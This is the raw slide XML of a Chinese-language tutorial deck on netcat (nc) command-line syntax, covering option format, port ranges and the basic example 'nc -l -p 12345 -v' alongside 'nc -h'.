            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>对于 “端口范围”，以两个数字分别表示 “开始和结束”，中间以【半角减号】相连。举例：1-1024</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="825" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555875" y="411480"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc 命令选项 主机 端口</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="16"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nector: Elbow 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4572629" y="-767018"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4675046"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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 name="Connector: Elbow 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4572628" y="1156632"/>
            <a:ext cx="13621" cy="5291815"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4595125"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="0F1D38"/>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îś1íḓè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683568" y="1897781"/>
            <a:ext cx="1446490" cy="1446462"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="iṧlîḑe"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013385" y="1897515"/>
            <a:ext cx="1447047" cy="1447018"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:noFill/>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="îṧḷidê"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7500992" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="îṧḷîḍè"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1156102" y="2111506"/>
            <a:ext cx="501422" cy="501413"/>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chemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr>
              <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779979" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7110074" y="2747747"/>
            <a:ext cx="1253667" cy="345440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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3623277" y="1059582"/>
            <a:ext cx="1874458" cy="345440"/>
            <a:chOff x="3623277" y="1285986"/>
            <a:chExt cx="1874458" cy="345440"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="išḷïḑè"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3623277" y="1292078"/>
              <a:ext cx="1874458" cy="334065"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="3175">
              <a:noFill/>
              <a:prstDash val="sysDash"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="1">
              <a:schemeClr val="accent1"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:fillRef>
            <a:effectRef idx="0">
              <a:schemeClr val="accent1"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
          <p:txBody>
            <a:bodyPr anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr>
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="文本框 39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3782047" y="1285986"/>
              <a:ext cx="1556919" cy="345440"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
              <a:spAutoFit/>
              <a:scene3d>
                <a:camera prst="orthographicFront"/>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene3d>
              <a:sp3d contourW="12700"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>命令行选项</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13" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2029942" y="1372380"/>
            <a:ext cx="5080132" cy="2976880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
            <a:sp3d contourW="12700"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>简单来说，nc 提供了一大堆【命令行选项】，分别对应它提供的功能。每个选项都是 “单字母” 的。有些选项需要带【选项值】，有些不需要。  </a:t>
            </a:r>
            <a:endParaRPr spc="225"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pc="225" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>你要使用的选项都放在 nc 这个命令之后，每个选项前面要有一个【半角减号】，选项之间以空格分开。  </a:t>
            </a:r>
            <a:endParaRPr spc="225"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bldLst>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="9"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24298" y="3164557"/>
            <a:ext cx="7895406" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745490" y="3242945"/>
            <a:ext cx="7774305" cy="1345565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>如果你的系统中已经有 nc，在命令行中执行如下，就可以看到它支持的全部命令选项的列表。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624298" y="1260670"/>
            <a:ext cx="7895406" cy="1495425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624297" y="1262031"/>
            <a:ext cx="1914585" cy="5921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2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>举例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745233" y="1854211"/>
            <a:ext cx="7774471" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="6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marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>在这个例子中，分别用到了三个选项（l、p、v），其中 12345 是选项p所带的【选项值】。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="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矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695635" y="446207"/>
            <a:ext cx="3752730" cy="468630"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令行选项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" b="1" spc="450" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="1370330"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc -l -p 12345 -v</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" spc="450"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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2915920" y="4212590"/>
            <a:ext cx="4329430" cy="375920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" spc="450" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" spc="450"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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
    <p:bldLst>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2"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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916940" y="1124585"/>
            <a:ext cx="3195955" cy="850265"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="254000" dist="63500" dir="5400000" algn="t"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dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>【常用的】命令行选项</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097060" y="2433764"/>
            <a:ext cx="4266294" cy="483870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="68580" tIns="34290" rIns="68580" bIns="34290" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr spc="600">
                <a:latin typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="方正书宋_GBK" panose="02000000000000000000" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>只列出【常用的】那些。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="直角三角形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2307028" y="1273629"/>
            <a:ext cx="6836228" cy="3869871"/>
          </a:xfrm>
          <a:prstGeom prst="r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932189" y="267245"/>
            <a:ext cx="3709466" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5363672" y="915843"/>
            <a:ext cx="2822802" cy="37610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3" name="图片 2" descr="Typora_kDQvzxERVr"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5367655" y="916305"/>
            <a:ext cx="2818130" cy="3723640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
